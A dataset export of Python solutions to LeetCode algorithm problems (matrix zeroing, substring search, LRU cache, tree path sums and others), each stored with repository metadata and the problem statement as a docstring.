"text": "class Solution:\n # @param matrix, a list of lists of integers\n # RETURN NOTHING, MODIFY matrix IN PLACE.\n def setZeroes(self, matrix):\n '''\n Given a m x n matrix, if an element is 0, set its entire row and column to 0. Do it in place.\n\nclick to show follow up.\nFollow up:\n\nDid you use extra space?\nA straight forward solution using O(mn) space is probably a bad idea.\nA simple improvement uses O(m + n) space, but still not the best solution.\nCould you devise a constant space solution?\n '''\n m = len(matrix)\n if m == 0:\n return\n n = len(matrix[0])\n row1zero = 1\n col1zero = 1\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n if i * j == 0:\n if i == 0:\n row1zero = 0\n if j == 0:\n col1zero = 0\n else:\n matrix[0][j] = 0\n matrix[i][0] = 0\n for i in range(1, m):\n for j in range(1, n):\n if matrix[0][j] * matrix[i][0] == 0:\n matrix[i][j] = 0\n for i in range(n):\n matrix[0][i] *= row1zero\n for i in range(m):\n matrix[i][0] *= col1zero\n"
},
{
"alpha_fraction": 0.530019998550415,
"alphanum_fraction": 0.54202800989151,
"avg_line_length": 34.7023811340332,
"blob_id": "049eca0784056f065fa63fd5fad1179c2f7c61e5",
"content_id": "1b186c14f7f7ee97c70d831c3c9be35e97aeee5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2998,
"license_type": "no_license",
"max_line_length": 234,
"num_lines": 84,
"path": "/Substring with Concatenation of All Words.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n def findSubstring(self, S, L):\n return self.findSubstring_usingDic(S, L)\n\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n # using dictionary 1700ms, O(len(S) * len(L))\n def findSubstring_usingDic(self, S, L):\n '''\n You are given a string, S, and a list of words, L, that are all of the same length. Find all starting indices of substring(s) in S that is a concatenation of each word in L exactly once and without any intervening characters.\n\nFor example, given:\nS: \"barfoothefoobarman\"\nL: [\"foo\", \"bar\"]\n\nYou should return the indices: [0,9].\n(order does not matter). \n '''\n n = len(L)\n if n == 0:\n return []\n word_len = len(L[0])\n allWordsDic = {}\n for s in L:\n if s not in allWordsDic:\n allWordsDic[s] = 1\n else:\n allWordsDic[s] += 1\n res = []\n for i in range(len(S) - n * word_len + 1):\n t_dic = allWordsDic.copy()\n flag = True\n for j in range(i, i + n * word_len, word_len):\n if S[j:j+word_len] not in t_dic:\n flag = False\n break\n t_dic[S[j:j+word_len]] -= 1\n if t_dic[S[j:j+word_len]] == 0:\n del t_dic[S[j:j+word_len]]\n if flag:\n res.append(i)\n return res\n\n # @param S, a string\n # @param L, a list of string\n # @return a list of integer\n # using dictionary 1700ms, O(len(S)), but can not pass the OJ because of the false positive\n def findSubstring_usingHash(self, S, L):\n '''\n You are given a string, S, and a list of words, L, that are all of the same length. Find all starting indices of substring(s) in S that is a concatenation of each word in L exactly once and without any intervening characters.\n\nFor example, given:\nS: \"barfoothefoobarman\"\nL: [\"foo\", \"bar\"]\n\nYou should return the indices: [0,9].\n(order does not matter).\n '''\n n = len(L)\n if n == 0:\n return []\n word_len = len(L[0])\n hashsum = sum([hash(s) for s in L])\n res = []\n hs = [0] * (len(S) + 1)\n for i in range(word_len, len(S) + 1):\n hs[i] += hs[i - word_len] + hash(S[i - word_len:i])\n print(S[i - word_len:i], hash(S[i - word_len:i]))\n return [i - n * word_len for i in range(n * word_len, len(S) + 1) \\\n if hs[i] - hs[i - n * word_len] == hashsum]\n\ns2 = ['a', ['a']]\ns0 = [\"barfoothefoobarman\", [\"foo\",\"bar\"]]\ns1 = [\"lingmindraboofooowingdingbarrwingmonkeypoundcake\", [\"fooo\",\"barr\",\"wing\",\"ding\",\"wing\"]]\ns3 = [\"abbbbbacbc\", [\"bc\",\"ac\"]]\ns = s3\nprint(s)\nprint(len(s[0]), len(s[1]))\nprint(Solution.findSubstring_usingDic(Solution(), s[0], s[1]))\nprint(Solution.findSubstring_usingHash(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.5360824465751648,
"alphanum_fraction": 0.5715922117233276,
"avg_line_length": 27.19354820251465,
"blob_id": "9be5a6161eda1a8676e727a5ef9be9d2ed7db2d9",
"content_id": "810bf17f9867930bebd057d4126f94ca2496308e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 883,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 31,
"path": "/Maximum Subarray.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @param A, a list of integers\n # @return an integer\n def maxSubArray(self, A):\n '''\n Find the contiguous subarray within an array (containing at least one number) which has the largest sum.\n\nFor example, given the array [−2,1,−3,4,−1,2,1,−5,4],\nthe contiguous subarray [4,−1,2,1] has the largest sum = 6.\n\nclick to show more practice.\nMore practice:\n\nIf you have figured out the O(n) solution, try coding another solution using the divide and conquer approach, which is more subtle.\n '''\n n = len(A)\n if n == 0:\n return 0\n m = A[0]\n sum = 0\n for i in range(n):\n sum += A[i]\n m = max(m, sum)\n sum = max(sum, 0)\n return m\n\na1 = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\na = a1\nprint(len(a), a)\nprint(Solution.maxSubArray(Solution(), a))"
},
{
"alpha_fraction": 0.4793388545513153,
"alphanum_fraction": 0.4958677589893341,
"avg_line_length": 30.842105865478516,
"blob_id": "6181459431011651762b20cfea520f9d63de1ba9",
"content_id": "ca6a4c3770a6d054afa1d14072c14b951f04ac81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 605,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 19,
"path": "/Longest Common Prefix.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def longestCommonPrefix(self, strs):\n '''\n Write a function to find the longest common prefix string amongst an array of strings. \n '''\n if len(strs) == 0:\n return \"\"\n if len(strs) == 1:\n return strs[0]\n lens = 0\n maxlen = len(strs[0])\n for str in strs:\n maxlen = min(maxlen, len(str))\n for lens in range(maxlen):\n for str in strs:\n if str[lens] != strs[0][lens]:\n return strs[0][0:lens]\n return strs[0][0:maxlen]\n"
},
{
"alpha_fraction": 0.5363724827766418,
"alphanum_fraction": 0.5441319346427917,
"avg_line_length": 34.55172348022461,
"blob_id": "73cd95d0f8ef3f9a24479f1446c32792959a0701",
"content_id": "0cb5fa49c93610f4d20335bf71122566ca3c93e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1031,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 29,
"path": "/Minimum Depth of Binary Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n def minDepth(self, root):\n '''Given a binary tree, find its minimum depth.\n\nThe minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.'''\n if root is None:\n return 0\n if root.left is None and root.right is None:\n return 1\n queue = [[root, 1]]\n while len(queue):\n node, depth = queue.pop(0)\n if node.left:\n if node.left.left is None and node.left.right is None:\n return depth + 1\n queue.append([node.left, depth + 1])\n if node.right:\n if node.right.left is None and node.right.right is None:\n return depth + 1\n queue.append([node.right, depth + 1])\n"
},
{
"alpha_fraction": 0.4007253050804138,
"alphanum_fraction": 0.4487760663032532,
"avg_line_length": 27.710525512695312,
"blob_id": "7c3a31105cf7ff0f124ce84d517c83e1c64a9e02",
"content_id": "e4731f47bae673deb152db4c29c17b67fa94384c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 216,
"num_lines": 38,
"path": "/Add Two Numbers.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @return a ListNode\n def addTwoNumbers(self, l1, l2):\n '''\n You are given two linked lists representing two non-negative numbers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.\n\nInput: (2 -> 4 -> 3) + (5 -> 6 -> 4)\nOutput: 7 -> 0 -> 8\n '''\n t1 = l1\n t2 = l2\n ex = 0\n l3 = ListNode(0)\n t3 = l3\n while t1 or t2:\n if t1 is None:\n n1 = 0\n else:\n n1 = t1.val\n t1 = t1.next\n if t2 is None:\n n2 = 0\n else:\n n2 = t2.val\n t2 = t2.next\n t3.next = ListNode((n1 + n2 + ex) % 10)\n ex = (n1 + n2 + ex) // 10\n t3 = t3.next\n if ex == 1:\n t3.next = ListNode(1)\n t3 = t3.next\n return l3.next\n "
},
{
"alpha_fraction": 0.46759259700775146,
"alphanum_fraction": 0.49537035822868347,
"avg_line_length": 36.565216064453125,
"blob_id": "9f8931b05c0ca6da0a82aea73059d6f1ca2101c7",
"content_id": "1e5481d3e86947c1e6ecd6a08d12fa6b8069956d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 23,
"path": "/Minimum Path Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param grid, a list of lists of integers\n # @return an integer\n def minPathSum(self, grid):\n '''\n Given a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path.\n\nNote: You can only move either down or right at any point in time.\n '''\n if len(grid) == 0:\n return 0\n m = len(grid)\n n = len(grid[0])\n dp = [[0] * n for row in range(m)]\n dp[0][0] = grid[0][0]\n for i in range(1, m):\n dp[i][0] = grid[i][0] + dp[i - 1][0]\n for i in range(1, n):\n dp[0][i] = grid[0][i] + dp[0][i - 1]\n for i in range(1, m):\n for j in range(1, n):\n dp[i][j] = grid[i][j] + min(dp[i - 1][j], dp[i][j - 1])\n return dp[m - 1][n - 1]\n"
},
{
"alpha_fraction": 0.48560816049575806,
"alphanum_fraction": 0.5116063356399536,
"avg_line_length": 25.924999237060547,
"blob_id": "530542d27e86f5f7b127756aea5ca5aebb504373",
"content_id": "dff6484270bce2cee20790e3b7f7e6be8b95f981",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1077,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 40,
"path": "/Search a 2D Matrix.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of integers\n # @param target, an integer\n # @return a boolean\n def searchMatrix(self, matrix, target):\n '''\n Write an efficient algorithm that searches for a value in an m x n matrix. This matrix has the following properties:\n\n Integers in each row are sorted from left to right.\n The first integer of each row is greater than the last integer of the previous row.\n\nFor example,\n\nConsider the following matrix:\n\n[\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\n\nGiven target = 3, return true.\n '''\n if len(matrix) == 0:\n return False\n m = len(matrix)\n n = len(matrix[0])\n l, r = 0, m * n - 1\n while l <= r:\n mid = (l + r) // 2\n midv = matrix[mid // n][mid % n]\n if l == r:\n return target == midv\n if midv == target:\n return True\n if midv < target:\n l = mid + 1\n else:\n r = mid - 1\n return False\n"
},
{
"alpha_fraction": 0.47955578565597534,
"alphanum_fraction": 0.49570924043655396,
"avg_line_length": 27.314285278320312,
"blob_id": "0ac58a0ac354ab634b8af3bb90b50f1c14429c60",
"content_id": "abeea3100bd6301adf42ef0b228d764196b4734e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1981,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 70,
"path": "/Scramble String.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isScramble(self, s1, s2):\n '''\n Given a string s1, we may represent it as a binary tree by partitioning it to two non-empty substrings recursively.\n\nBelow is one possible representation of s1 = \"great\":\n\n great\n / \\\n gr eat\n / \\ / \\\ng r e at\n / \\\n a t\n\nTo scramble the string, we may choose any non-leaf node and swap its two children.\n\nFor example, if we choose the node \"gr\" and swap its two children, it produces a scrambled string \"rgeat\".\n\n rgeat\n / \\\n rg eat\n / \\ / \\\nr g e at\n / \\\n a t\n\nWe say that \"rgeat\" is a scrambled string of \"great\".\n\nSimilarly, if we continue to swap the children of nodes \"eat\" and \"at\", it produces a scrambled string \"rgtae\".\n\n rgtae\n / \\\n rg tae\n / \\ / \\\nr g ta e\n / \\\n t a\n\nWe say that \"rgtae\" is a scrambled string of \"great\".\n\nGiven two strings s1 and s2 of the same length, determine if s2 is a scrambled string of s1. \n '''\n n = len(s1)\n if n != len(s2):\n return False\n if n == 0:\n return True\n dp = [[[False] * n for col in range(n)] for row in range(n + 1)]\n for i in range(n):\n for j in range(n):\n dp[1][i][j] = (s1[i] == s2[j])\n dp[0][i][j] = True\n for l in range(2, n + 1):\n for i in range(n - l + 1):\n for j in range(n - l + 1):\n for k in range(1, l):\n if (dp[k][i][j] and dp[l-k][i+k][j+k]) \\\n or (dp[k][i][j+l-k] and dp[l-k][i+k][j]):\n dp[l][i][j] = True\n break\n return dp[n][0][0]\n\ns1 = ['rgtae', 'greta']\ns2 = ['at', 'at']\ns3 = [\"pcighfdjnbwfkohtklrecxnooxyipj\", \"npodkfchrfpxliocgtnykhxwjbojie\"]\ns = s3\nprint(len(s[0]), s[0], s[1])\nprint(Solution.isScramble(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.3398374021053314,
"alphanum_fraction": 0.4032520353794098,
"avg_line_length": 31.36842155456543,
"blob_id": "ac0a0e2e55f9de1040db37c183c6836127935271",
"content_id": "00e74bd2051a3853513b3011a265a1ee5fc3a63c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 615,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 19,
"path": "/Integer to Roman.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def intToRoman(self, num):\n '''\n Given an integer, convert it to a roman numeral.\n\nInput is guaranteed to be within the range from 1 to 3999.\n '''\n dic = [[\"M\", 1000], [\"CM\", 900], [\"D\", 500], [\"CD\", 400], [\"C\", 100],\n [\"XC\", 90], [\"L\", 50], [\"XL\", 40], [\"X\", 10],\n [\"IX\", 9], [\"V\", 5], [\"IV\", 4], [\"I\", 1]]\n s = \"\"\n index = 0\n while num > 0:\n while num >= dic[index][1]:\n s += dic[index][0]\n num -= dic[index][1]\n index += 1\n return s\n"
},
{
"alpha_fraction": 0.5549525022506714,
"alphanum_fraction": 0.5881953835487366,
"avg_line_length": 34.95121765136719,
"blob_id": "59c655d5d5b31b0ec6b279494e89e7a5c67b45a7",
"content_id": "d97b6b2dbddca0417902c74757d35cf98799e9a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1474,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 41,
"path": "/Insert Interval.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for an interval.\n# class Interval:\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution:\n # @param intervals, a list of Intervals\n # @param newInterval, a Interval\n # @return a list of Interval\n def insert(self, intervals, newInterval):\n '''\n Given a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).\n\nYou may assume that the intervals were initially sorted according to their start times.\n\nExample 1:\nGiven intervals [1,3],[6,9], insert and merge [2,5] in as [1,5],[6,9].\n\nExample 2:\nGiven [1,2],[3,5],[6,7],[8,10],[12,16], insert and merge [4,9] in as [1,2],[3,10],[12,16].\n\nThis is because the new interval [4,9] overlaps with [3,5],[6,7],[8,10]. \n '''\n i = 0\n while i < len(intervals):\n if intervals[i].end < newInterval.start or newInterval.end < intervals[i].start:\n i += 1\n continue\n newInterval.start = min(newInterval.start, intervals[i].start)\n newInterval.end = max(newInterval.end, intervals[i].end)\n del intervals[i]\n inserted = False\n for i in range(len(intervals)):\n if intervals[i].start >= newInterval.start:\n intervals.insert(i, newInterval)\n inserted = True\n break\n if not inserted:\n intervals.append(newInterval)\n return intervals\n"
},
{
"alpha_fraction": 0.5303030014038086,
"alphanum_fraction": 0.5512820482254028,
"avg_line_length": 30.77777862548828,
"blob_id": "b217ae0c6c8716fe280c1921e776173b3d4a3d7e",
"content_id": "91c9e322937f7356af44f977c1c1e3a24e04ba16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 27,
"path": "/Remove Duplicates from Sorted List II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n '''\n Given a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list.\n\nFor example,\nGiven 1->2->3->3->4->4->5, return 1->2->5.\nGiven 1->1->1->2->3, return 2->3. \n '''\n dummyHead = ListNode(-1)\n dummyHead.next = head\n t = dummyHead\n while t:\n while t.next and t.next.next and t.next.val == t.next.next.val:\n del_v = t.next.val\n while t.next and t.next.val == del_v:\n t.next = t.next.next\n t = t.next\n return dummyHead.next\n"
},
{
"alpha_fraction": 0.5155367255210876,
"alphanum_fraction": 0.5197740197181702,
"avg_line_length": 25.259260177612305,
"blob_id": "72619a0f4a3f89f9303edf9a3d79567eefd23ee2",
"content_id": "a5e8c2f2f1bde7098a9fe0e1d536302bd258fce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 27,
"path": "/Anagrams.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param strs, a list of strings\n # @return a list of strings\n def anagrams(self, strs):\n '''\n Given an array of strings, return all groups of strings that are anagrams.\n\nNote: All inputs will be in lower-case.\n '''\n hashTable = {}\n for s in strs:\n sorted_s = sorted(s)\n ss = ''.join(sorted_s)\n if ss not in hashTable:\n hashTable[ss] = []\n hashTable[ss].append(s)\n\n res = []\n for s in hashTable:\n if len(hashTable[s]) > 1:\n res += [os for os in hashTable[s]]\n return res\n\ns1 = ['cbad']\ns = s1\nprint(s)\nprint(Solution.anagrams(Solution(), s))"
},
{
"alpha_fraction": 0.42541855573654175,
"alphanum_fraction": 0.4596651494503021,
"avg_line_length": 33.605262756347656,
"blob_id": "767210df6093496d488b621b62493a8962675f7f",
"content_id": "238cf6f71fee042db2a62883c37c5af1ae9731b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1314,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 38,
"path": "/Valid Sudoku.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param board, a 9x9 2D array\n # @return a boolean\n def isValidSudoku(self, board):\n '''\n Determine if a Sudoku is valid, according to: Sudoku Puzzles - The Rules.\n\nThe Sudoku board could be partially filled, where empty cells are filled with the character '.'.\n\n\nA partially filled sudoku which is valid.\n\nNote:\nA valid Sudoku board (partially filled) is not necessarily solvable. Only the filled cells need to be validated. \n '''\n row = [set() for i in range(9)]\n col = [set() for i in range(9)]\n cube = [set() for i in range(9)]\n for i in range(9):\n for j in range(9):\n x = board[i][j]\n k = i // 3 * 3 + j // 3\n if x == '.':\n continue\n if x in row[i] or x in col[j] or x in cube[k]:\n return False\n row[i].add(x)\n col[j].add(x)\n cube[k].add(x)\n return True\n\na0 = [\"....9..9.\",\".........\",\"4..89...1\",\"4.3......\",\".........\",\"...5..9..\",\"....1.7..\",\"...4.....\",\".....6...\"]\na1 = [\".87654321\",\"2........\",\"3........\",\"4........\",\"5........\",\"6........\",\"7........\",\"8........\",\"9........\"]\n\na = a1\nfor i in range(9):\n print(a[i])\nprint(Solution.isValidSudoku(Solution(), a))"
},
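The only non-obvious index above is the box number k = i // 3 * 3 + j // 3; a tiny check that it really partitions the 81 cells into nine 3x3 boxes (illustrative, not from the file):

boxes = {}
for i in range(9):
    for j in range(9):
        boxes.setdefault(i // 3 * 3 + j // 3, set()).add((i, j))
assert sorted(boxes) == list(range(9)) and all(len(v) == 9 for v in boxes.values())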
{
"alpha_fraction": 0.5211267471313477,
"alphanum_fraction": 0.5372233390808105,
"avg_line_length": 28,
"blob_id": "ac0bc736e141af235343648058c0230abb7b1981",
"content_id": "28bcbd74828424078864f604b5917e5ae1884c4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 994,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 34,
"path": "/Swap Nodes in Pairs.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param a ListNode\n # @return a ListNode\n def swapPairs(self, head):\n '''\n Given a linked list, swap every two adjacent nodes and return its head.\n\nFor example,\nGiven 1->2->3->4, you should return the list as 2->1->4->3.\n\nYour algorithm should use only constant space. You may not modify the values in the list, only nodes itself can be changed. \n '''\n dummyHead = ListNode(0)\n dummyHead.next = head\n t = dummyHead\n while t:\n n1 = t.next\n if not t.next:\n return dummyHead.next\n n2 = t.next.next\n if not t.next.next:\n return dummyHead.next\n next = t.next.next.next\n n2.next = n1\n n1.next = next\n t.next = n2\n t = n1\n return dummyHead.next\n "
},
{
"alpha_fraction": 0.5796178579330444,
"alphanum_fraction": 0.5881103873252869,
"avg_line_length": 29.7391300201416,
"blob_id": "8b685bc7886415be79466d0d77b35e9a8a21d4a0",
"content_id": "2b1d4134ca8361f6a309ea078de1fb9e6024b661",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1413,
"license_type": "no_license",
"max_line_length": 196,
"num_lines": 46,
"path": "/LRU Cache.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class LRUCache:\n \"\"\" Design and implement a data structure for Least Recently Used (LRU) cache. It should support the following operations: get and set.\n\nget(key) - Get the value (will always be positive) of the key if the key exists in the cache, otherwise return -1.\nset(key, value) - Set or insert the value if the key is not already present. When the cache reached its capacity, it should invalidate the least recently used item before inserting a new item. \"\"\"\n\n # @param capacity, an integer\n def __init__(self, capacity):\n self.size = capacity\n self.cache = {}\n self.uselist = []\n\n # @return an integer\n def get(self, key):\n res = self.cache.get(key)\n if res:\n self.usekey(key)\n return res\n else:\n return -1\n\n # @param key, an integer\n # @param value, an integer\n # @return nothing\n def set(self, key, value):\n v = self.cache.get(key)\n if v:\n self.cache[key] = value\n self.usekey(key)\n else:\n if len(self.cache) == self.size:\n okey = self.uselist.pop()\n self.cache.pop(okey)\n self.cache[key] = value\n self.uselist.insert(0, key)\n\n def usekey(self, key):\n self.uselist.remove(key)\n self.uselist.insert(0, key)\n\nss = LRUCache(1)\nss.set(2, 1)\nss.get(2)\nss.set(3,2)\nss.get(2)\nss.get(3)"
},
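Because uselist is a plain list, usekey's list.remove makes both operations O(capacity); the same eviction policy runs in O(1) per operation with collections.OrderedDict. A standalone sketch for comparison (my naming), exercised on the same call sequence as the test at the bottom of the file:

from collections import OrderedDict

class LRUCacheOD:
    def __init__(self, capacity):
        self.size = capacity
        self.od = OrderedDict()            # iteration order == recency order

    def get(self, key):
        if key not in self.od:
            return -1
        self.od.move_to_end(key)           # mark as most recently used
        return self.od[key]

    def set(self, key, value):
        if key in self.od:
            self.od.move_to_end(key)
        self.od[key] = value
        if len(self.od) > self.size:
            self.od.popitem(last=False)    # evict the least recently used

c = LRUCacheOD(1)
c.set(2, 1)
assert c.get(2) == 1
c.set(3, 2)
assert c.get(2) == -1 and c.get(3) == 2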
{
"alpha_fraction": 0.5485770106315613,
"alphanum_fraction": 0.5603532791137695,
"avg_line_length": 26.567567825317383,
"blob_id": "6455634bd24dba09f9ab36550c8aef0bc20b1b69",
"content_id": "76b56eac6bd2c913ccc818d83ee0b2b04f0b430d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1019,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 37,
"path": "/ZigZag Conversion.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def convert(self, s, nRows):\n '''\n The string \"PAYPALISHIRING\" is written in a zigzag pattern on a given number of rows like this: (you may want to display this pattern in a fixed font for better legibility)\n\nP A H N\nA P L S I I G\nY I R\n\nAnd then read line by line: \"PAHNAPLSIIGYIR\"\n\nWrite the code that will take a string and make this conversion given a number of rows:\n\nstring convert(string text, int nRows);\n\nconvert(\"PAYPALISHIRING\", 3) should return \"PAHNAPLSIIGYIR\". \n '''\n if nRows <= 1:\n return s\n interval = 2 * nRows - 2\n res = s[::interval]\n for i in range(1, nRows - 1):\n k = i\n x = interval - 2 * i\n while k < len(s):\n res += s[k]\n k += x\n x = interval - x\n res += s[nRows - 1::interval]\n return res\n\ns0 = \"AB\"\ns1 = \"PAYPALISHIRING\"\ns = s0\nprint(len(s), s)\nprint(Solution.convert(Solution(), s, 1))"
},
{
"alpha_fraction": 0.4385805130004883,
"alphanum_fraction": 0.44949954748153687,
"avg_line_length": 18.625,
"blob_id": "8ffa6d40e214abfd1c63dfbeac0648f0c489c595",
"content_id": "2eb5e55dc796c5d139e18f5ae41596aa50f2bf91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1099,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 56,
"path": "/Flatten Binary Tree to Linked List.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return nothing, do it in place\n def flatten(self, root):\n ''' Given a binary tree, flatten it to a linked list in-place.\n\nFor example,\nGiven\n\n 1\n / \\\n 2 5\n / \\ \\\n 3 4 6\n\nThe flattened tree should look like:\n\n 1\n \\\n 2\n \\\n 3\n \\\n 4\n \\\n 5\n \\\n 6\n'''\n self.dfs(root)\n\n def dfs(self, node):\n if not node:\n return node\n if not node.left and not node.right:\n return node\n l = self.dfs(node.left)\n r = self.dfs(node.right)\n if l is None:\n return r\n elif r is None:\n node.right = node.left\n node.left = None\n return l\n else:\n l.right = node.right\n node.right = node.left\n node.left = None\n return r\n"
},
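A sketch that replays the docstring example through the flatten routine above, assuming the Solution class is in scope and supplying the commented-out TreeNode class:

```python
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

# Build the example tree: 1 -> (2 -> (3, 4)), (5 -> (_, 6))
n = {i: TreeNode(i) for i in range(1, 7)}
n[1].left, n[1].right = n[2], n[5]
n[2].left, n[2].right = n[3], n[4]
n[5].right = n[6]

Solution().flatten(n[1])
t, vals = n[1], []
while t:
    vals.append(t.val)  # after flattening, the list hangs off the .right pointers
    t = t.right
print(vals)  # expected: [1, 2, 3, 4, 5, 6]
```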
{
"alpha_fraction": 0.4992503821849823,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 25.68000030517578,
"blob_id": "758b60881e6388b7e1dbc61c5a604d3bab21a122",
"content_id": "fc8b48439881c7fbe584bac08d89457dd2da702e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1334,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 50,
"path": "/Path Sum II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @param sum, an integer\n # @return a list of lists of integers\n def pathSum(self, root, sum):\n ''' Given a binary tree and a sum, find all root-to-leaf paths where each path's sum equals the given sum.\nFor example:\nGiven the below binary tree and sum = 22,\n\n 5\n / \\\n 4 8\n / / \\\n 11 13 4\n / \\ / \\\n 7 2 5 1\n\nreturn\n\n[\n [5,4,11,2],\n [5,8,4,5]\n]\n'''\n reslist = []\n self.dfs(root, 0, [], sum, reslist)\n return reslist\n\n def dfs(self, node, cursum, curlist, sum, reslist):\n if node is None:\n return\n if node.left is None and node.right is None:\n if cursum + node.val == sum:\n curlist.append(node.val)\n reslist.append(list(curlist))\n curlist.pop()\n return\n curlist.append(node.val)\n self.dfs(node.left, cursum + node.val, curlist, sum, reslist)\n curlist.pop()\n curlist.append(node.val)\n self.dfs(node.right, cursum + node.val, curlist, sum, reslist)\n curlist.pop()\n"
},
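A driver for pathSum above, reproducing the docstring example; a sketch assuming the Solution class is in scope, with TreeNode supplied:

```python
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

root = TreeNode(5)
root.left, root.right = TreeNode(4), TreeNode(8)
root.left.left = TreeNode(11)
root.left.left.left, root.left.left.right = TreeNode(7), TreeNode(2)
root.right.left, root.right.right = TreeNode(13), TreeNode(4)
root.right.right.left, root.right.right.right = TreeNode(5), TreeNode(1)

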